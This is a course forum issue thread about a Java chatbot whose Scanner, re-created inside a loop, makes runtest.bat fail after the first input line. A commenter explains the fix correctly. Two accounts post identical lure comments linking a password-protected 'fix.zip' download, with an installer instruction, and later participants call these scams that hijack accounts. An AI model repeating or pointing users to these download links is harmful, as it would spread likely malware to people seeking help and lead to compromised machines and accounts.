### ISSUE TITLE
How do I allow multiple lines of text input for runtest.bat?

### ISSUE THREAD

**Issue by ty-3401** [nus-cs2103-AY2425S1/forum#84]
In order to automatically test some features of the chatbot, I've added multiple lines of text to the input.txt such as
```
todo test
bye
```
https://github.com/lm-44/ip/blob/master/text-ui-test/input.txt

However, runtest.bat only outputs the result for the 1st command "todo test" as seen in ACTUAL.TXT below, and not the second line. e.g.
```
Exception in thread "main" java.util.NoSuchElementException: No line found
        at java.base/java.util.Scanner.nextLine(Scanner.java:1660)
        at Cook.main(Cook.java:29)
Comparing files ACTUAL.TXT and EXPECTED.TXT
***** ACTUAL.TXT
____________________________________________________________
Your task list file has been updated with the todo! It can be found under "data\Task List.txt".
You now have 1 task(s) in the list!
____________________________________________________________
***** EXPECTED.TXT
____________________________________________________________
Bye. Hope to see you again soon!
____________________________________________________________
*****

Press any key to continue . . .
```
https://github.com/lm-44/ip/blob/master/text-ui-test/ACTUAL.TXT

How do I fix this? This is the link to the runtest.bat: https://github.com/lm-44/ip/blob/master/text-ui-test/runtest.bat. I run it by double-clicking the batch script in file explorer.

Link to my master branch:
https://github.com/lm-44/ip

**Comment by RezwanAhmed123** [comment]
Hi would it be possible for you to also put in ur branch so we can take a look at your current code to get better context?

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Incogdino** [comment]
The reason this happens is because you keep creating a new instance of the scanner every time the loop repeats.

When the first instance of the scanner is created, it takes in an input. When ran without a script, this is the user keyboard input. When ran with a script, this is the input text file provided. 

Thus on every loop iteration, a new instance of the scanner means that the previous input stream gets reset and it awaits for new user/ file input. Since there is no other file supplied, you get the error that you see, "Exception in thread "main" java.util.NoSuchElementException: No line found". The program then terminates and gives you the mismatch between your expected and actual files.

To resolve this, you can create your scanner instance outside of the while loop.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Incogdino** [comment]
Are people actually clicking on the link and getting their accounts hacked? Why do these scam messages keep showing up in multiple threads? Some of these accounts look pretty legitimate

**Comment by damithc** [comment]
> Are people actually clicking on the link and getting their accounts hacked? Why do these scam messages keep showing up in multiple threads? Some of these accounts look pretty legitimate

Yup, a real nuisance. This happens from time to time but this one seems more dangerous than the ones we've encountered before.

**Comment by ty-3401** [comment]
> The reason this happens is because you keep creating a new instance of the scanner every time the loop repeats.
> 
> When the first instance of the scanner is created, it takes in an input. When ran without a script, this is the user keyboard input. When ran with a script, this is the input text file provided.
> 
> Thus on every loop iteration, a new instance of the scanner means that the previous input stream gets reset and it awaits for new user/ file input. Since there is no other file supplied, you get the error that you see, "Exception in thread "main" java.util.NoSuchElementException: No line found". The program then terminates and gives you the mismatch between your expected and actual files.
> 
> To resolve this, you can create your scanner instance outside of the while loop.

I see, ty for the help!
